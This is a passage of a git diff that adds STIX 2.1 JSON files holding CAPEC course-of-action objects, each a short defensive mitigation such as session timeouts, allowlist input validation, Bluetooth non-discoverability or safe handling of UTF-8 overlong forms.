+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c.json
new file mode 100644
index 0000000000000000000000000000000000000000..29da1f6f27438575e7e9a2c8862bbb52ec674472
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--0ca7f347-a3f3-4363-957f-75be0488295b",
+ "objects": [
+ {
+ "created": "2021-06-24T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "When using Bluetooth, set it to hidden or non-discoverable mode.",
+ "id": "course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-666-1",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14972566-8d51-44fb-adb1-2ba9e5872a5d.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14972566-8d51-44fb-adb1-2ba9e5872a5d.json
new file mode 100644
index 0000000000000000000000000000000000000000..8b3913dcc5a6c847db00b94113409ffe611aac76
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14972566-8d51-44fb-adb1-2ba9e5872a5d.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--540f3ccc-a092-40bc-9add-e28d930e562e",
+ "objects": [
+ {
+ "created": "2022-09-29T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Leverage automated tools, such as Checkmarx's \"ChainJacking\" tool, to determine susceptibility to Repo Jacking attacks.",
+ "id": "course-of-action--14972566-8d51-44fb-adb1-2ba9e5872a5d",
+ "modified": "2023-01-24T00:00:00.000Z",
+ "name": "coa-695-3",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b.json
new file mode 100644
index 0000000000000000000000000000000000000000..94ff59edda3450b12db35a4453ea8e83ea3c74b2
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--cd1f7e45-1c94-4a24-8811-bac87686e73a",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Only accept software updates from an official source.",
+ "id": "course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "name": "coa-533-0",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14ea1dd8-a232-4071-897a-a930751702bb.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14ea1dd8-a232-4071-897a-a930751702bb.json
new file mode 100644
index 0000000000000000000000000000000000000000..dc13a4d872ac8f2f08493c2724110ee794c9ba1d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14ea1dd8-a232-4071-897a-a930751702bb.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--478e0c0e-7f9d-4f9f-a049-35a7cc7d85d7",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Use commonly accepted algorithms and recommended key sizes. The key size used will depend on how important it is to keep the data confidential and for how long.",
+ "id": "course-of-action--14ea1dd8-a232-4071-897a-a930751702bb",
+ "modified": "2021-06-24T00:00:00.000Z",
+ "name": "coa-20-0",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14fb4c87-4528-48c8-a104-1ffa4a22f6b4.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14fb4c87-4528-48c8-a104-1ffa4a22f6b4.json
new file mode 100644
index 0000000000000000000000000000000000000000..97e34d28f12d1382a74522c05319b957cf3ef53d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--14fb4c87-4528-48c8-a104-1ffa4a22f6b4.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--3fb800bf-b364-4905-b94c-5b8bc6b3327c",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "\n The exact response required from an UTF-8 decoder on invalid input is not uniformly defined by the standards. In general, there are several ways a UTF-8 decoder might behave in the event of an invalid byte sequence:\n \n 1. Insert a replacement character (e.g. '?', '').\n 2. Ignore the bytes.\n 3. Interpret the bytes according to a different character encoding (often the ISO-8859-1 character map).\n 4. Not notice and decode as if the bytes were some similar bit of UTF-8.\n 5. Stop decoding and report an error (possibly giving the caller the option to continue).\n \n It is possible for a decoder to behave in different ways for different types of invalid input.\n RFC 3629 only requires that UTF-8 decoders must not decode \"overlong sequences\" (where a character is encoded in more bytes than needed but still adheres to the forms above). The Unicode Standard requires a Unicode-compliant decoder to \"...treat any ill-formed code unit sequence as an error condition. This guarantees that it will neither interpret nor emit an ill-formed code unit sequence.\"\n Overlong forms are one of the most troublesome types of UTF-8 data. The current RFC says they must not be decoded but older specifications for UTF-8 only gave a warning and many simpler decoders will happily decode them. Overlong forms have been used to bypass security validations in high profile products including Microsoft's IIS web server. Therefore, great care must be taken to avoid security issues if validation is performed before conversion from UTF-8, and it is generally much simpler to handle overlong forms before any input validation is done.\n To maintain security in the case of invalid input, there are two options. 
The first is to decode the UTF-8 before doing any input validation checks. The second is to use a decoder that, in the event of invalid input, returns either an error or text that the application considers to be harmless. Another possibility is to avoid conversion out of UTF-8 altogether but this relies on any other software that the data is passed to safely handling the invalid data.\n Another consideration is error recovery. To guarantee correct recovery after corrupt or lost bytes, decoders must be able to recognize the difference between lead and trail bytes, rather than just assuming that bytes will be of the type allowed in their position.\n ",
+ "id": "course-of-action--14fb4c87-4528-48c8-a104-1ffa4a22f6b4",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-80-1",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--151dfa37-7bda-429b-b4cf-aeeba88b9b8c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--151dfa37-7bda-429b-b4cf-aeeba88b9b8c.json
new file mode 100644
index 0000000000000000000000000000000000000000..8740952259884dc4915ad842b125f40de1fae465
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--151dfa37-7bda-429b-b4cf-aeeba88b9b8c.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--96faf0ae-e63a-4bb7-85ea-dcda75a778f4",
+ "objects": [
+ {
+ "created": "2022-09-29T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "If applicable, confirm extensions/plugins are properly signed by the official developers.",
+ "id": "course-of-action--151dfa37-7bda-429b-b4cf-aeeba88b9b8c",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-698-4",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--159fff7f-a612-4bd7-8053-34885f345613.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--159fff7f-a612-4bd7-8053-34885f345613.json
new file mode 100644
index 0000000000000000000000000000000000000000..a75fa98b7dba4eb79e884e281b33646f343feb67
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--159fff7f-a612-4bd7-8053-34885f345613.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--3f290a99-7360-418e-81b3-825fae4e24aa",
+ "objects": [
+ {
+ "created": "2022-09-29T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Even if the metadata is properly checked and a user believes it to be legitimate, there may still be a chance that they've been duped. Therefore, leverage automated testing techniques to determine where malicious areas of the code may exist.",
+ "id": "course-of-action--159fff7f-a612-4bd7-8053-34885f345613",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-690-2",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--cb529162-8335-438c-9301-27477c72f990.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--cb529162-8335-438c-9301-27477c72f990.json
new file mode 100644
index 0000000000000000000000000000000000000000..11348a2eedd2544d4f325a5e33a6fb1a231974c1
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--cb529162-8335-438c-9301-27477c72f990.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--4588cce4-3d4b-479b-9f73-027e8d7a28a8",
+ "objects": [
+ {
+ "created": "2021-10-21T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Test security identifier definition, access, and programming flow in both pre-silicon and post-silicon environments.",
+ "id": "course-of-action--cb529162-8335-438c-9301-27477c72f990",
+ "modified": "2021-10-21T00:00:00.000Z",
+ "name": "coa-681-2",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9.json
new file mode 100644
index 0000000000000000000000000000000000000000..e5a5a1267fb73430479a4c2017453eac79b83ac5
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--efb6f206-3fca-4e48-a470-6382a91ba9f9",
+ "objects": [
+ {
+ "created": "2021-06-24T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Limit user permissions to prevent browser pivoting.",
+ "id": "course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-662-3",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d39d9ad3-ca67-4292-8e1c-279a1dd878b5.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d39d9ad3-ca67-4292-8e1c-279a1dd878b5.json
new file mode 100644
index 0000000000000000000000000000000000000000..8882123e5995365345596c8e398ad6a6f6958318
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d39d9ad3-ca67-4292-8e1c-279a1dd878b5.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--c48ed632-dd81-4972-8d49-43a02f0834f8",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Configuration: Prioritize Transfer-Encoding header over Content-Length, whenever an HTTP message contains both.",
+ "id": "course-of-action--d39d9ad3-ca67-4292-8e1c-279a1dd878b5",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-273-7",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d8644789-b5aa-430b-ba1a-8debdc9b27e0.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d8644789-b5aa-430b-ba1a-8debdc9b27e0.json
new file mode 100644
index 0000000000000000000000000000000000000000..39259a61f0ecca04be5f67ff9faa34569e6abcf4
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d8644789-b5aa-430b-ba1a-8debdc9b27e0.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--03037058-757d-4a5f-825d-f3a96f6e5561",
+ "objects": [
+ {
+ "created": "2021-10-21T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Ensure that protected and unprotected memory ranges are isolated and do not overlap.",
+ "id": "course-of-action--d8644789-b5aa-430b-ba1a-8debdc9b27e0",
+ "modified": "2021-10-21T00:00:00.000Z",
+ "name": "coa-679-0",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d984401e-2a31-4aab-af29-a41a5cbc9c1c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d984401e-2a31-4aab-af29-a41a5cbc9c1c.json
new file mode 100644
index 0000000000000000000000000000000000000000..abf93058b773b69d45c16a763e0c30820df8ad45
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d984401e-2a31-4aab-af29-a41a5cbc9c1c.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--2f593181-df41-4886-a332-55c49bd0dfa2",
+ "objects": [
+ {
+ "created": "2021-10-21T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Implement configuration management security practices that protect the integrity of software and associated data.",
+ "id": "course-of-action--d984401e-2a31-4aab-af29-a41a5cbc9c1c",
+ "modified": "2023-01-24T00:00:00.000Z",
+ "name": "coa-678-0",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--dc4fe24d-19d8-40da-a0a0-4f3ccb7efe44.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--dc4fe24d-19d8-40da-a0a0-4f3ccb7efe44.json
new file mode 100644
index 0000000000000000000000000000000000000000..608d5536031399b108dfd1dcf95ad21cba8393c6
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--dc4fe24d-19d8-40da-a0a0-4f3ccb7efe44.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--23021092-ef4b-4c18-982c-642558a2d1bb",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Access to the directories should be restricted as to prevent attackers from manipulating the files. Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file.",
+ "id": "course-of-action--dc4fe24d-19d8-40da-a0a0-4f3ccb7efe44",
+ "modified": "2020-07-30T00:00:00.000Z",
+ "name": "coa-27-1",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--df3a44eb-5da6-49ab-bd34-9ae02959482e.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--df3a44eb-5da6-49ab-bd34-9ae02959482e.json
new file mode 100644
index 0000000000000000000000000000000000000000..c120875d9a306c2c1c578c67aafaa65dd520c5c8
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--df3a44eb-5da6-49ab-bd34-9ae02959482e.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--41eb2b4c-2274-46c6-b6b7-813c6d508cec",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Perform output validation for all remote content.",
+ "id": "course-of-action--df3a44eb-5da6-49ab-bd34-9ae02959482e",
+ "modified": "2023-01-24T00:00:00.000Z",
+ "name": "coa-19-5",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c.json
new file mode 100644
index 0000000000000000000000000000000000000000..1a14f20f844303c33420974701521755507c35d9
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--487da86e-d43f-4f69-a7c6-0f10693e7cc0",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Limit the amount of resources that are accessible to unprivileged users.",
+ "id": "course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c",
+ "modified": "2020-12-17T00:00:00.000Z",
+ "name": "coa-130-0",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e5ebd596-622e-4395-b338-85a54ce00b34.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e5ebd596-622e-4395-b338-85a54ce00b34.json
new file mode 100644
index 0000000000000000000000000000000000000000..de313baba26704e5e1e543277dae163f98f5b843
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e5ebd596-622e-4395-b338-85a54ce00b34.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--46df4189-35f3-42c8-be23-977b0c1d9440",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Implementation: Utilize a session timeout for all sessions, for example 20 minutes. If the user does not explicitly logout, the server terminates their session after this period of inactivity. If the user logs back in then a new session key is generated.",
+ "id": "course-of-action--e5ebd596-622e-4395-b338-85a54ce00b34",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-21-5",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e818356e-b136-4fb6-a5f6-5e4208739ef7.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e818356e-b136-4fb6-a5f6-5e4208739ef7.json
new file mode 100644
index 0000000000000000000000000000000000000000..759d0f401df90af7bbcc46d395ea92cfb3f3167a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e818356e-b136-4fb6-a5f6-5e4208739ef7.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--bdedce33-5622-4e9e-8164-0875a263111e",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Implementation: Employ DNS resolvers that prevent external names from resolving to internal addresses.",
+ "id": "course-of-action--e818356e-b136-4fb6-a5f6-5e4208739ef7",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-275-2",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2.json
new file mode 100644
index 0000000000000000000000000000000000000000..11c1c9ea482d4f8b139c16e0196cf50caa55cf5f
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--e3123c7b-e1a0-4368-8080-5cf7bf20dafc",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification -- using an allowlist approach.",
+ "id": "course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-126-11",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ee51f6de-33e8-47c5-8d8b-17a99bc76e1c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ee51f6de-33e8-47c5-8d8b-17a99bc76e1c.json
new file mode 100644
index 0000000000000000000000000000000000000000..bf0b71ba98dcb74220673b908cfe927b54f18e37
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ee51f6de-33e8-47c5-8d8b-17a99bc76e1c.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--56ff4b8e-52ef-410c-a15b-6d6b279d021c",
+ "objects": [
+ {
+ "created": "2018-07-31T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Leverage hardware components known to not be susceptible to these types of attacks.",
+ "id": "course-of-action--ee51f6de-33e8-47c5-8d8b-17a99bc76e1c",
+ "modified": "2021-06-24T00:00:00.000Z",
+ "name": "coa-638-0",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2.json
new file mode 100644
index 0000000000000000000000000000000000000000..66ce6c6db60abd40d8c2733b37e4ce50a8384dbf
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--d0d9122f-392a-467f-bc98-4e87ca472e50",
+ "objects": [
+ {
+ "created": "2015-11-09T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Ensure users are not reusing username/password combinations for multiple systems, applications, or services.",
+ "id": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-560-2",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f448a9da-f220-4155-8e2d-9731566e757b.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f448a9da-f220-4155-8e2d-9731566e757b.json
new file mode 100644
index 0000000000000000000000000000000000000000..4e354595324fe108a3a259d82420ee946736e8c7
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f448a9da-f220-4155-8e2d-9731566e757b.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--2ee55fd2-f0da-4562-b8e2-dbb5163e0461",
+ "objects": [
+ {
+ "created": "2022-09-29T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Do not allow the forwarding of data resulting from a faulting or assisted instruction. Some current mitigations claim to zero out the forwarded data, but this mitigation still does not suffice.",
+ "id": "course-of-action--f448a9da-f220-4155-8e2d-9731566e757b",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-696-0",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f74b7999-9f3c-4cda-82d5-a40b0620f072.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f74b7999-9f3c-4cda-82d5-a40b0620f072.json
new file mode 100644
index 0000000000000000000000000000000000000000..307f3f043824aafbed254b5dee7197199d97ce52
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f74b7999-9f3c-4cda-82d5-a40b0620f072.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--44866670-06a6-4173-b2c6-212adba5ed9d",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
